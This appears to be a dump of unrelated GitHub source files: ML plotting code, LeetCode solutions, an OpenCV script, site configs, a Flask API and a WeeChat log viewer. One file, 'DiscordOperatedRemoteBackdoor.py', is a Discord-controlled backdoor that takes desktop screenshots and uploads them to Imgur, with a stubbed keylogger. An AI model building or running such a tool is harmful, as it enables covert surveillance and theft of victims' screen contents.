np.concatenate(unsupervised_labels_true).astype(\"int\")\n#\n# from sklearn import metrics\n# from sklearn.cluster import KMeans, AgglomerativeClustering, DBSCAN\n# from sklearn.preprocessing import StandardScaler\n# #split 70-30?\n#\n# def dbscan_predict(model, X):\n#\n# nr_samples = X.shape[0]\n#\n# y_new = np.ones(shape=nr_samples, dtype=int) * -1\n#\n# for i in range(nr_samples):\n# diff = model.components_ - X[i, :] # NumPy broadcasting\n#\n# dist = np.linalg.norm(diff, axis=1) # Euclidean distance\n#\n# shortest_dist_idx = np.argmin(dist)\n#\n# if dist[shortest_dist_idx] < model.eps:\n# y_new[i] = model.labels_[model.core_sample_indices_[shortest_dist_idx]]\n#\n# return y_new\n#\n# #train unsupervised k-means\n# sil_scores = []\n# # unsupervised_train = unsupervised_data[:,[0,1]]\n# # unsupervised_train = unsupervised_data[:,[1,2]]\n# # unsupervised_train = unsupervised_data[:,[0,1,2]]\n# unsupervised_train = unsupervised_data[:,[0]]\n# n_clusters_range= np.arange(3,20)\n#\n# # for n_clusters in n_clusters_range:\n# # kmeans_model = KMeans(n_clusters=n_clusters, random_state=10).fit(unsupervised_train)\n# # trained_labels = kmeans_model.labels_\n# # sil_score = metrics.silhouette_score(unsupervised_train, trained_labels, metric='euclidean')\n# # print(sil_score)\n# # sil_scores.append(sil_score)\n# # best_n_clusters = n_clusters_range[np.argmax(sil_scores)]\n# # print(\"BEST N CLUSTERS:{}\".format(best_n_clusters))\n# # print(\"SILHOUTTE SCORE:{}\".format(np.max(sil_scores)))\n#\n# best_n_clusters = 11\n# # unsupervised_model = KMeans(n_clusters=best_n_clusters).fit(unsupervised_train)\n# # unsupervised_model = AgglomerativeClustering().fit(unsupervised_train)\n# unsupervised_model = DBSCAN(eps=2, min_samples=5).fit(unsupervised_train)\n#\n# #predict using k-means\n# # unsupervised_labels_pred = unsupervised_model.predict(unsupervised_train)\n# # unsupervised_labels_pred = AgglomerativeClustering(n_clusters=11).fit_predict(unsupervised_train)\n# unsupervised_labels_pred = dbscan_predict(unsupervised_model,unsupervised_train)\n# nmi_score = metrics.normalized_mutual_info_score(unsupervised_labels_true, unsupervised_labels_pred)\n# fowlkes_mallows_score = metrics.fowlkes_mallows_score(unsupervised_labels_true, unsupervised_labels_pred)\n# ajrand_score = metrics.adjusted_rand_score(unsupervised_labels_true, unsupervised_labels_pred)\n# sil_score = metrics.silhouette_score(unsupervised_train, unsupervised_labels_pred, metric='euclidean')\n# print(nmi_score)\n# print(ajrand_score)\n# print(fowlkes_mallows_score)\n# print(sil_score)\n#\n# fig = plt.figure(dpi=250)\n# ax = fig.add_subplot(111, projection='3d')\n# ax.scatter(unsupervised_data[:,0],unsupervised_data[:,1],unsupervised_data[:,2], c=unsupervised_labels_pred)\n#\n#\n#\n#\n# #==============ADDITIONAL PLOTS===============\n# fig, axes = plt.subplots(total_sensors,3)\n# for sensor_id in range(total_sensors):\n# x_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\n# axes[sensor_id,0].boxplot(recon_noise[sensor_id],showfliers=show_outliers)\n# axes[sensor_id,0].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,0].set_ylabel(sensor_names[sensor_id].upper())\n#\n# axes[sensor_id,1].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,1].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,2].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,2].set_xticklabels(x_tick_labels_eff)\n#\n# fig, axes = plt.subplots(total_sensors,3)\n# for sensor_id in range(total_sensors):\n# x_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\n# axes[sensor_id,0].boxplot(recon_drift[sensor_id],showfliers=show_outliers)\n# axes[sensor_id,0].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,0].set_ylabel(sensor_names[sensor_id].upper())\n#\n# axes[sensor_id,1].boxplot(np_unc_result_drift[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,1].set_xticklabels(x_tick_labels_eff)\n#\n# axes[sensor_id,2].boxplot(np_unc_result_drift[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,2].set_xticklabels(x_tick_labels_eff)\n#\n#\n\n#=======PLOT LATENT VARIABLE===========\n# from sklearn.decomposition import PCA\n#\n# sensor_index = 10\n# alea_index = 0\n# epi_index = 1\n# alea_key = 'y_cov'\n# severity_index = 2\n#\n# squared = 1\n#\n# epi_sample_noise = (result_noise[sensor_index][severity_index]['y_pred'][epi_index][index_sample])**squared\n# epi_sample_drift = (result_drift[sensor_index][severity_index]['y_pred'][epi_index][index_sample])**squared\n# epi_sample_ood = (result_ood['y_pred'][epi_index][index_sample])**squared\n# epi_sample_test = (result_test['y_pred'][epi_index][index_sample])**squared\n#\n# alea_sample_noise = (result_noise[sensor_index][severity_index][alea_key][alea_index][index_sample])**squared\n# alea_sample_drift = (result_drift[sensor_index][severity_index][alea_key][alea_index][index_sample])**squared\n# alea_sample_ood = (result_ood[alea_key][alea_index][index_sample])**squared\n# alea_sample_test = (result_test[alea_key][alea_index][index_sample])**squared\n#\n# alea_plot_list = [alea_sample_test,alea_sample_ood,alea_sample_drift,alea_sample_noise]\n# epi_plot_list = [epi_sample_test,epi_sample_ood,epi_sample_drift,epi_sample_noise]\n# combined_plot_list = [alea_sample+epi_sample for alea_sample,epi_sample in zip(alea_plot_list,epi_plot_list)]\n# pca = PCA(n_components=2)\n#\n# def get_stacked_labels(plot_list):\n# sample_test = plot_list[0]\n# labels = np.array([np.ones(sample_test.shape[0])*id for id in range(len(plot_list))]).reshape(-1)\n# stacked = np.stack(plot_list).reshape(-1,sample_test.shape[-1])\n# stacked_pc = pca.fit_transform(stacked)\n#\n# return stacked_pc,labels\n#\n# fig, (ax1,ax2,ax3) = plt.subplots(3,1,figsize=(5,10),dpi=150)\n# alea_stacked_pc, alea_pc_labels = get_stacked_labels(alea_plot_list)\n# epi_stacked_pc, epi_pc_labels = get_stacked_labels(epi_plot_list)\n# total_stacked_pc, total_pc_labels = get_stacked_labels(combined_plot_list)\n#\n# scat1=ax1.scatter(alea_stacked_pc[:,0], alea_stacked_pc[:,1],c=alea_pc_labels)\n# ax1.legend(*scat1.legend_elements())\n# scat2=ax2.scatter(epi_stacked_pc[:,0], epi_stacked_pc[:,1],c=epi_pc_labels)\n# ax2.legend(*scat2.legend_elements())\n# scat3=ax3.scatter(total_stacked_pc[:,0], total_stacked_pc[:,1],c=total_pc_labels)\n# ax3.legend(*scat3.legend_elements())\n#\n# #plot latent_z\n# sensor_index = -10\n# latent_z_test_mu = result_test['latent_z'][0][index_sample]\n# latent_z_test_std = result_test['latent_z'][1][index_sample]\n# latent_z_ood_mu = result_ood['latent_z'][0][index_sample]\n# latent_z_ood_std = result_ood['latent_z'][1][index_sample]\n# latent_z_noise_mu = result_noise[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_noise_std = result_noise[sensor_index][severity_index]['latent_z'][1][index_sample]\n# latent_z_drift_mu = result_drift[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_drift_std = result_drift[sensor_index][severity_index]['latent_z'][1][index_sample]\n#\n# def plot_noise_drift_severity(sensor_index,severity_index, mode=\"mu\"):\n# if mode == \"mu\":\n# latent_z_noise = result_noise[sensor_index][severity_index]['latent_z'][0][index_sample]\n# latent_z_drift = result_drift[sensor_index][severity_index]['latent_z'][0][index_sample]\n# else:\n# latent_z_noise= result_noise[sensor_index][severity_index]['latent_z'][1][index_sample]\n# latent_z_drift = result_drift[sensor_index][severity_index]['latent_z'][1][index_sample]\n#\n# scatter_shape = latent_z_noise[:,0].shape\n# plt.scatter(latent_z_noise[:,0],latent_z_noise[:,1], alpha=0.2, c =(1*np.ones(scatter_shape)).astype(int),cmap='summer')\n# plt.scatter(latent_z_drift[:,0],latent_z_drift[:,1], alpha=0.2, c =(1*np.ones(scatter_shape)).astype(int),cmap='viridis')\n#\n# plt.figure()\n# plot_alpha = 0.2\n# plt.scatter(latent_z_test_mu[:,0],latent_z_test_mu[:,1])\n# plt.scatter(latent_z_ood_mu[:,0],latent_z_ood_mu[:,1])\n# sensor_index = -11\n# for i in range(1,4):\n# plot_noise_drift_severity(sensor_index=sensor_index,severity_index=i,mode=\"mu\")\n# plt.title(\"Z-MU SENSOR \"+str(sensor_index))\n#\n# plt.figure()\n# plot_alpha = 0.2\n# plt.scatter(latent_z_test_std[:,0],latent_z_test_std[:,1])\n# plt.scatter(latent_z_ood_std[:,0],latent_z_ood_std[:,1])\n# sensor_index = -11\n# for i in range(1,4):\n# plot_noise_drift_severity(sensor_index=sensor_index,severity_index=i,mode=\"std\")\n# plt.title(\"Z-STD SENSOR \"+str(sensor_index))\n#\n# for i in range(17):\n# sensor_index = i\n# x_test_diff = (x_test_noise[sensor_index][0]-x_test_noise[sensor_index][2]).sum()\n# print(\"NOISE:\"+str(i)+str(x_test_diff))\n# print(\"--------------\")\n# for i in range(17):\n# sensor_index = i\n# x_test_diff = (x_test_drift[sensor_index][0]-x_test_drift[sensor_index][2]).sum()\n# print(\"DRIFT:\"+str(i)+str(x_test_diff))\n#\n# x_test_diff = (x_test_noise[sensor_index][0]-x_test_noise[sensor_index][3]).sum()\n# feature_index=-10\n# plt.figure()\n# plt.hist(x_test_noise[sensor_index][0][:,feature_index],alpha=0.25)\n# plt.hist(x_test_noise[sensor_index][-1][:,feature_index],alpha=0.25)\n# plt.hist(x_test_drift[sensor_index][-1][:,feature_index],alpha=0.25)\n# plt.legend([\"HEALTHY\",\"NOISE\",\"DRIFT\"])\n#\n#\n#\n","repo_name":"bangxiangyong/bae-drift-detection-zema-hydraulic","sub_path":"2_bayesian_autoencoder.py","file_name":"2_bayesian_autoencoder.py","file_ext":"py","file_size_in_byte":28667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26879909274","text":"from typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n\n l, r = 0, len(nums) - 1\n while l < r:\n mid = l + ((r - l) // 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] < target:\n l = mid + 1\n else:\n r = mid\n\n return l if nums[l] == target else -1\n\n\n\"\"\"\nRuntime: O(logN)\nSpace: O(1)\n\nRuntime: 260 ms, faster than 74.53% of Python3 online submissions for Binary Search.\nMemory Usage: 13.9 MB, less than 100.00% of Python3 online submissions for Binary Search.\n\"\"\"\n","repo_name":"SamSamhuns/wallbreakers_projekts","sub_path":"Leetcode/week_3/p0704_binary_search.py","file_name":"p0704_binary_search.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30974648724","text":"'''\nApproach-1 : Without Using Hash-Map\n'''\n\nclass Solution(object):\n def findRestaurant(self, list1, list2):\n \"\"\"\n :type list1: List[str]\n :type list2: List[str]\n :rtype: List[str]\n \"\"\"\n CommonHotel = []\n LeastIndexSum = float('inf')\n for hotel in range(0,len(list1)):\n index = 0\n if list1[hotel] in list2 :\n index = list2.index(list1[hotel])\n if index+hotel <= LeastIndexSum :\n LeastIndexSum = index+hotel\n CommonHotel.append(list1[hotel])\n \n return CommonHotel\n","repo_name":"shreyatpandey/Coding-Challenges","sub_path":"Python/Minimum Index Sum of Two Lists.py","file_name":"Minimum Index Sum of Two Lists.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10589454815","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport cv2 as cv\nimport sys\n\nCOLOR_RED = (0, 0, 255)\nCOLOR_GREEN = (0, 255, 0)\nCOLOR_BLUE = (255, 0, 0)\n\ndef preprocessing(img):\n # conversao da imagem para escala de cinza\n img_gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # aplicacao de filtro gaussiano\n imgblur = cv.GaussianBlur(img_gray, (3,3), 0)\n # aplicacao de filtro laplaciano\n imglap = cv.Laplacian(imgblur, cv.CV_16S, ksize=3)\n # conversao para uint8\n imgabs = cv.convertScaleAbs(imglap)\n # equalizacao de histograma\n imgeq = cv.equalizeHist(imgabs)\n # filtro de media\n imgblur = cv.blur(imgeq, (5,5))\n # limiarizacao binaria\n ret,thresh1 = cv.threshold(imgblur,120,255,cv.THRESH_BINARY_INV)\n # opening\n kernel = np.ones((13,13),np.uint8)\n opening = cv.morphologyEx(thresh1, cv.MORPH_OPEN, kernel)\n # dilatacao\n kernel_dl = np.ones((3,3),np.uint8)\n dilation = cv.dilate(opening,kernel_dl,iterations = 1)\n \n return dilation\n\ndef detect(file):\n output = cv.imread(file)\n jeans = cv.cvtColor(output, cv.COLOR_BGR2GRAY)\n jeans = cv.blur(jeans, (30,30))\n _, jeans = cv.threshold(jeans, 20, 255, cv.THRESH_BINARY)\n edges = cv.Canny(jeans, 50, 100)\n contours, _ = cv.findContours(edges, cv.RETR_LIST, cv.CHAIN_APPROX_NONE)\n for idx, contour in enumerate(contours):\n length = cv.arcLength(contour, closed=True)\n if length < 150: continue\n\n x,y,w,h = cv.boundingRect(contour)\n ellipse = cv.fitEllipse(contour)\n cv.putText(\n output, f'{int(length)}',\n (x+(w//2),y+(h//2)), cv.FONT_HERSHEY_SIMPLEX, 1.5, COLOR_GREEN, 5\n )\n cv.ellipse(output, ellipse, COLOR_RED, 2)\n\n cv.imwrite(f'{file.split()[0]}_out.png', output)\n\ndef main():\n [detect(f) for f in sys.argv[1:]]\n\nif __name__ == '__main__':\n main()\n","repo_name":"caiocmb7/python-rep","sub_path":"pdi/projetopdi/repositorio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16451212367","text":"import mini_fiction\nfrom mini_fiction.settings import Config as BaseConfig\n\n\nclass PonyfictionConfig:\n SITE_NAME = {'default': 'Библиотека ponyfiction.org'}\n SITE_INDEX_TITLE = {'default': 'Библиотека ponyfiction.org'}\n SITE_DESCRIPTION = {'default': 'Библиотека фанфиков по вселенной сериала My Little Pony: Friendship is Magic'}\n SITE_FEEDBACK = 'https://tabun.everypony.ru/talk/add/?talk_users=andreymal'\n COPYRIGHT = {'default': 'Все права принадлежат пони.'}\n\n SERVER_NAME_REGEX = r'(stories\\.everypony\\.(ru|org|info))|ponyfiction\\.org'\n\n USER_AGENT_POSTFIX = 'ponyfiction.org/{}'.format(mini_fiction.__version__)\n\n REGISTRATION_AUTO_LOGIN = True\n REGISTRATION_OPEN = True\n\n CELERY_CONFIG = dict(BaseConfig.CELERY_CONFIG)\n CELERY_CONFIG['task_always_eager'] = False\n\n SPHINX_DISABLED = False\n\n CAPTCHA_CLASS = 'mini_fiction.captcha.ReCaptcha'\n CAPTCHA_FOR_GUEST_COMMENTS = False\n\n LOCALSTATIC_ROOT = 'localstatic'\n LOCALTEMPLATES = 'templates'\n\n STORY_COMMENTS_BY_GUEST = False\n NEWS_COMMENTS_BY_GUEST = False\n MINIMUM_VOTES_FOR_VIEW = 5\n\n PUBLISH_SIZE_LIMIT = 400\n\n FAVICON_URL = '/localstatic/i/favicon.ico'\n\n SITEMAP_PING_URLS = ['http://google.com/ping?sitemap={url}']\n\n CONTACTS = [\n {\n 'name': 'xmpp',\n 'label': {\n 'default': 'Jabber ID (XMPP)',\n },\n 'schema': {\n 'regex': r'^.+@([^.@][^@]+)',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в адресе jabber: похоже, он неправильный'}\n },\n 'link_template': 'xmpp:{value}?message;type=chat',\n 'title_template': '{value}',\n },\n {\n 'name': 'skype',\n 'label': {\n 'default': 'Skype ID',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине skype: похоже, он неправильный'}\n },\n 'link_template': 'skype:{value}',\n 'title_template': '{value}',\n },\n {\n 'name': 'telegram',\n 'label': {\n 'default': 'Telegram',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине Telegram: похоже, он неправильный'}\n },\n 'link_template': 'https://t.me/{value}',\n 'title_template': '{value}',\n },\n {\n 'name': 'tabun',\n 'label': {\n 'default': 'Логин на Табуне',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9-_]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в имени пользователя: похоже, оно неправильно'}\n },\n 'link_template': 'https://tabun.everypony.ru/profile/{value}/',\n 'title_template': '{value}',\n },\n {\n 'name': 'forum',\n 'label': {\n 'default': 'Профиль на Форуме',\n },\n 'schema': {\n 'regex': r'^https?://forum.everypony.ru/memberlist.php\\?.+$',\n 'error_messages': {'regex': 'Вставьте полную ссылку на профиль'}\n },\n 'link_template': '{value}',\n 'title_template': '{value}',\n },\n {\n 'name': 'vk',\n 'label': {\n 'default': 'Логин ВКонтакте',\n },\n 'schema': {\n 'regex': r'^[a-zA-Z0-9\\._-]+$',\n 'error_messages': {'regex': 'Пожалуйста, исправьте ошибку в логине ВК: похоже, он неправильный'}\n },\n 'link_template': 'https://vk.com/{value}',\n 'title_template': '{value}',\n },\n ]\n","repo_name":"andreymal/ponyfiction.org","sub_path":"ponyfiction_settings.py","file_name":"ponyfiction_settings.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"12631025101","text":"import discord\nfrom discord.ext import commands\nimport pyautogui\nimport tempfile\nfrom imgurpython import ImgurClient\nfrom pynput.keyboard import Key, Listener\nimport os\nimport logging\nimport win32api\nimport win32console\nimport win32gui\nimport pythoncom, pyhooks\nfrom tkinter.commondialog import Dialog\nimport ctypes # An included library with Python install. \nimport time\nimport psutil\nimport keyboard\nimport time\n\ndef on_press(event):\n if event.key == \"\":\n print(\"Key pressed:\", event)\n\n# Define intents (all default intents are enabled)\nintents = discord.Intents.default()\n\n# Create a bot instance with the defined intents\nbot = commands.Bot(command_prefix='!', intents=intents)\n\ndef Mbox(title, text, style):\n return ctypes.windll.user32.MessageBoxW(0, text, title, style)\n\n# Replace with your own Imgur client ID and secret\nclient_id = 'C_ID'\nclient_secret = 'C_Secret'\n\n# Define the on_message event\n@bot.event\nasync def on_message(message):\n # Ignore messages sent by the bot itself\n if message.author == bot.user:\n return\n\n # Define a condition: If the message content is \"hello\"\n if message.content.lower() == 'keylog':\n await message.channel.send('Keylogging started!')\n while True:\n keyboard.on_press = on_press\n time.sleep(1)\n elif message.content.lower() == 'help':\n await message.channel.send('commands\\n\\nscreenshot - capture screenshot of desktop\\nkeylog - start keylogging feature\\nmsgbox (Message) - display a messaegbox on PC')\n\n elif message.content.lower() == 'msgbox':\n await message.channel.send('command 3')\n\n if 'msgbox' in message.content.lower():\n # Split the message content into words\n words = message.content.split()\n\n # Find the index of the command\n command_index = words.index('msgbox')\n command_keyword = \"msgbox\"\n # Check if there's any data following the command\n if command_index + 1 < len(words):\n # Get the data following the command\n command_index = message.content.lower().index(command_keyword)\n\n # Calculate the index of the data following the command (including spaces)\n data_index = command_index + len(command_keyword)\n\n # Get the data following the command (including spaces)\n data = message.content[data_index:]\n\n # Strip leading and trailing spaces from the data\n data = data.strip()\n Mbox(\"DORB\", data, 1)\n\n # Store the data in a variable or process it as needed\n print(\"Message sent:\", data)\n\n # You can also send the data back to the channel\n await message.channel.send(f\"Data following the command: {data}\")\n else:\n await message.channel.send(\"No data found following the command.\")\n\n # Another condition: If the message content contains \"question\"\n if 'screenshot' in message.content.lower():\n # Create an Imgur client instance\n client = ImgurClient(client_id, client_secret)\n\n # Take a screenshot\n screenshot = pyautogui.screenshot()\n\n # Save the screenshot to a temporary file\n with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as temp_file:\n screenshot.save(temp_file.name)\n\n # Upload the image to Imgur\n uploaded_image = client.upload_from_path(temp_file.name, config=None, anon=True)\n\n # Get the link to the uploaded image\n image_link = uploaded_image['link']\n\n print(f\"Image uploaded to: {image_link}\")\n await message.channel.send(image_link)\n\n # This line is required to process commands, if you're using the commands extension\n\n# Replace 'your_token_here' with your bot's token\nbot.run('API_Key')\n","repo_name":"LogicPy/Python","sub_path":"DORB/DiscordOperatedRemoteBackdoor.py","file_name":"DiscordOperatedRemoteBackdoor.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"22723404601","text":"#\r\n# file name: RangeFinder_stub\r\n# Description: RangeFinder replacement code for those lacking hardware\r\n# Author(s): Mario Shebib \r\n#\r\n\r\nfrom time import sleep\r\n\r\nclass RangeFinder_stub:\r\n \"\"\"\r\n This class is a stub that imitates the range finder sensor for running the code without the hardware\r\n \"\"\" \r\n def __init__(self):\r\n try:\r\n self.file = open(\"./stub_text/initial_range.txt\", \"r\")\r\n except FileNotFoundError as e:\r\n print(\"Could not open test file for range finder.\")\r\n exit(1)\r\n\r\n def get_range(self):\r\n \"\"\"\r\n By decreasing or increasing the distance by 50 millimeters each time the code runs\r\n This method imitates the real life actions of a user interacting with the distance sensor.\r\n \"\"\"\r\n while True:\r\n line = self.file.readline().strip()\r\n if line != '':\r\n break\r\n sleep(2)\r\n return int(line)\r\n\r\nclass RangeFinder_Interactive_stub:\r\n def get_range(self):\r\n print(\"Range finder stub\")\r\n while True:\r\n try:\r\n range_value = int(input(\"Range in mm: \"))\r\n except ValueError:\r\n print(\"Invalid range.\")\r\n continue\r\n else:\r\n return range_value\r\n\r\n","repo_name":"MorganJamesSmith/sysc3010_group_project","sub_path":"src/stub/RangeFinder_stub.py","file_name":"RangeFinder_stub.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20965602644","text":"from flask import jsonify, request\nfrom ...v1 import version_1 as v1\nfrom ..schemas.meetup_schema import MeetupSchema\nfrom ..models.meetup_model import Meetup\nfrom flask_jwt_extended import (jwt_required, get_jwt_identity)\n\ndb = Meetup()\n\n@v1.route('/meetups', methods=['POST'])\ndef create_meetup():\n \"\"\" Function to create a meetup \"\"\"\n json_data = request.get_json()\n\n # No data has been provided\n if not json_data:\n return jsonify({'status': 400, 'error': 'No data provided'}), 400\n\n # Check if request is valid\n data, errors = MeetupSchema().load(json_data)\n if errors:\n return jsonify({'status': 400, 'error' : 'Invalid data. Please fill all required fields', 'errors': errors}), 400\n\n if db.exists('topic', data['topic']):\n return jsonify({'status': 409, 'message' : 'Meetup already does exists'}), 409\n\n \n # Save new meetup and return response\n new_meetup = db.save(data)\n result = MeetupSchema().dump(new_meetup).data\n return jsonify({'status': 201, 'message': 'Meetup created successfully', 'data': [result]}), 201\n\n@v1.route('/meetups/', methods=['GET'])\ndef fetch_meetup(meetup_id):\n \"\"\" Function to fetch specific meetup \"\"\"\n # Check if meetup exists \n if not db.exists('id', meetup_id):\n return jsonify({'status': 404, 'error': 'Meetup not found'}), 404\n\n # Get meetups \n meetups = db.fetch_by_id(meetup_id)\n result = MeetupSchema(many=True).dump(meetups).data\n return jsonify({'status':200, 'data':result}), 200\n\n@v1.route('/meetups/upcoming', methods=['GET'])\ndef fetch_upcoming_meetups():\n \"\"\" Function to fetch all meetups \"\"\"\n meetups = db.all()\n result = MeetupSchema(many=True).dump(meetups).data\n return jsonify({'status':200, 'data':result}), 200\n\n\n","repo_name":"MbuguaCaleb/Questioner-endpoints","sub_path":"app/api/v1/views/meetup_view.py","file_name":"meetup_view.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10226377611","text":"import os, sys\nfrom PIL import Image, ImageShow\n\nfrom read_input import read_input\n\nclass Tree:\n def __init__(self, height):\n self.visible_west = True\n self.visible_east = True\n self.visible_north = True\n self.visible_south = True\n self.distance_west = 0\n self.distance_east = 0\n self.distance_north = 0\n self.distance_south = 0\n self.height = height\n self.scenic_score = 0\n\ndef set_visible(grid, x,y):\n height = len(grid)\n width = len(grid[0])\n target = grid[x][y]\n #validate north\n for test_y in range(y-1, -1, -1):\n target.distance_north += 1\n if(grid[x][test_y].height >= target.height):\n target.visible_north = False\n break\n\n #validate south\n for test_y in range(y + 1,height):\n target.distance_south += 1\n if(grid[x][test_y].height >= target.height):\n target.visible_south = False\n break\n\n #validate west\n for test_x in range(x-1, -1, -1):\n target.distance_west += 1\n print(f\"west: this tree at {x} current index {test_x}\")\n if(grid[test_x][y].height >= target.height):\n target.visible_west = False\n break\n\n #validate east\n for test_x in range(x + 1,width):\n target.distance_east += 1\n if(grid[test_x][y].height >= target.height):\n target.visible_east = False\n break\n\n target.scenic_score = target.distance_west * target.distance_east * \\\n target.distance_north * target.distance_south\n\n\nif __name__ == '__main__':\n lines = read_input('../day8/input.txt')\n print(lines)\n grid = []\n #init grid with rows\n for y in range(len(lines)):\n grid.append([])\n for x in range(len(lines[y])):\n grid[-1].append(Tree(int(lines[y][x])))\n\n preview = Image.new(\"RGBA\", [len(lines[0]), len(lines)])\n print(grid)\n\n step = int(255 / 10)\n totalVisible = 0\n highestScore = 0\n bestTree = None\n highestCoords = (0,0)\n for y in range(len(grid)):\n for x in range(len(grid[y])):\n set_visible(grid, x,y)\n #g = 255 if grid[x][y].visible_north == True else 0\n #b = 255 if grid[x][y].visible_south == True else 0\n #preview.putpixel([x,y], (step * grid[y][x].height,g,b))\n target = grid[x][y]\n height = target.height\n visible = target.visible_north or target.visible_south \\\n or target.visible_east or target.visible_west\n if visible:\n totalVisible += 1\n #preview.putpixel([y,x], ((step * height) if visible else 0,0,0,255))\n preview.putpixel([y,x], (255,255,255) if visible else (0,0,0))\n\n if target.scenic_score > highestScore:\n highestScore = target.scenic_score\n highestCoords = (x,y)\n bestTree = target\n\n\n ImageShow.show(preview)\n print(totalVisible)\n print(f\"Highest score: {highestScore} at {highestCoords}\")\n","repo_name":"jackson-fb/AOC2022","sub_path":"day8/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26539360748","text":"import sys\nimport glob\nfrom datetime import datetime\nfrom dateutil.parser import parse\nimport time\n\n\ndef file_get_contents(filename):\n with open(filename) as f:\n return f.read()\n\nif len(sys.argv) != 4:\n print(\n \"\\r\\n\\r\\nUsage: python kanari.py [path] [number of kanari files] [max age in days]\\r\\nExample: python kanari.py \\\"/srv/storage/backups/libvirt-filesystems/*/backup_kanarie.txt\\\" 13 8\\r\\n\\r\\n\")\n sys.exit()\n\npath = sys.argv[1]\nnumberOfKanari = sys.argv[2]\nmaxAgeKanari = sys.argv[3]\n\nitems = glob.glob(path)\n\n# verify number of kanaries\nitemsFoundCnt = len(items)\nif int(itemsFoundCnt) != int(numberOfKanari):\n print(\"CRITICAL: Number of kanari did not match, expected: {} got: {}\".format(numberOfKanari, itemsFoundCnt))\n sys.exit()\n\nnow = datetime.now()\ntotalAge = 0\n\n# verify kanari age\nfor x in items:\n datestring = file_get_contents(x)\n\n datestring = datetime.strptime(datestring[0:8], '%Y%m%d')\n # result is a typeof datetime.timedelta\n delta = now - datestring\n sumDelta = 0\n sumDelta = sumDelta + delta.days\n\n if delta.days > int(maxAgeKanari):\n print(\"CRITICAL: kanari too old, max days ago expected: {} got date {}\".format(maxAgeKanari, delta.days))\n\naverage = sumDelta / itemsFoundCnt\nprint(\"OK: got {} kanari average age {} days\\r\\n\".format(itemsFoundCnt, sumDelta))\n","repo_name":"Hivos/nagios","sub_path":"kanari.py","file_name":"kanari.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73409330987","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nl = list(input().strip())\n\nstack = deque()\n\ncnt = 0\n\npriority = {\"+\":2,\"-\":2,\"*\":1,\"/\":1}\n\nfor i in l:\n if \"A\" <= i <= \"Z\":\n print(i,end=\"\")\n else:\n if len(stack) == 0:\n stack.append(i)\n elif i == \"(\":\n stack.append(i)\n cnt += 1\n elif i == \")\":\n temp = stack.pop()\n while temp != \"(\":\n print(temp,end=\"\")\n temp = stack.pop()\n cnt -= 1\n else:\n while len(stack) > 0 and stack[len(stack) - 1] in priority and priority[stack[len(stack) - 1]] <= priority[i]:\n print(stack.pop(),end=\"\")\n stack.append(i)\n\n\n\nwhile len(stack) != 0:\n print(stack.pop(),end=\"\")","repo_name":"Yun-YeoJun/BOJ_Python","sub_path":"solutions/bj1918.py","file_name":"bj1918.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13275489758","text":"from collections import namedtuple\nimport os\nfrom pathlib import Path\n\nfrom flask import abort, Flask, render_template\nfrom flask_common import Common\n\napp = Flask(__name__)\ncommon = Common(app)\n\nLOGDIR = Path.home()/'.weechat/logs' # WIP: Make configurable.\np = Path(LOGDIR)\nMessage = namedtuple('Message', ['timestamp', 'author', 'text'])\nchart = {}\nnum = 0\n\nclass Chat(object):\n def __init__(self, filepath, slug):\n self.filepath = filepath\n self.slug = slug\n \n @property\n def messages(self):\n msgs = []\n with open(self.filepath) as f:\n lines = f.readlines()\n\n for line in lines:\n broken_message = line.split()\n author = broken_message[2]\n if author in ('<--', '-->', '--', '=!=', 